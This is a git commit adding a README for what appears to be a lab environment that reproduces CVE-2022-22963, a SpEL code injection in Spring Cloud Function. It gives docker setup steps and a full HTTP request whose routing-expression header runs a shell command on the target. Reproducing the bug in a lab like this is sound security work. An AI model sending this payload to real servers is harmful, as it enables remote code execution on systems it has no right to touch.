first commit

spring/CVE-2022-22963/README.md

@@ -0,0 +1,48 @@
+# Spring Cloud Function SpEL Code Injection (CVE-2022-22963)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Spring Cloud Function provides a common model for deploying function-based software on a variety of platforms, including FaaS (function as a service) platforms like Amazon AWS Lambda.
+
+References:
+
+- <https://tanzu.vmware.com/security/cve-2022-22963>
+- <https://mp.weixin.qq.com/s/onYJWIESgLaWS64lCgsKdw>
+- <https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f>
+
+## Vulnerability Environment
+
+Execute the following command to start a server that uses Spring Cloud Function 3.2.2:
+
+```
+docker compose up -d
+```
+
+After server is started, execute `curl http://your-ip:8080/uppercase -H "Content-Type: text/plain" --data-binary test` you can convert the user input to uppercase.
+
+## Vulnerability Reproduce
+
+There is a SpEL expression injection in the request header `spring.cloud.function.routing-expression`.
+
+Send the following request to execute `touch /tmp/success` on the target server:
+
+```
+POST /functionRouter HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
+Content-Type: text/plain
+Content-Length: 4
+
+test
+```
+
+![](1.png)
+
+As you can see, `touch /tmp/success` has been executed successfully.
+
+![](2.png)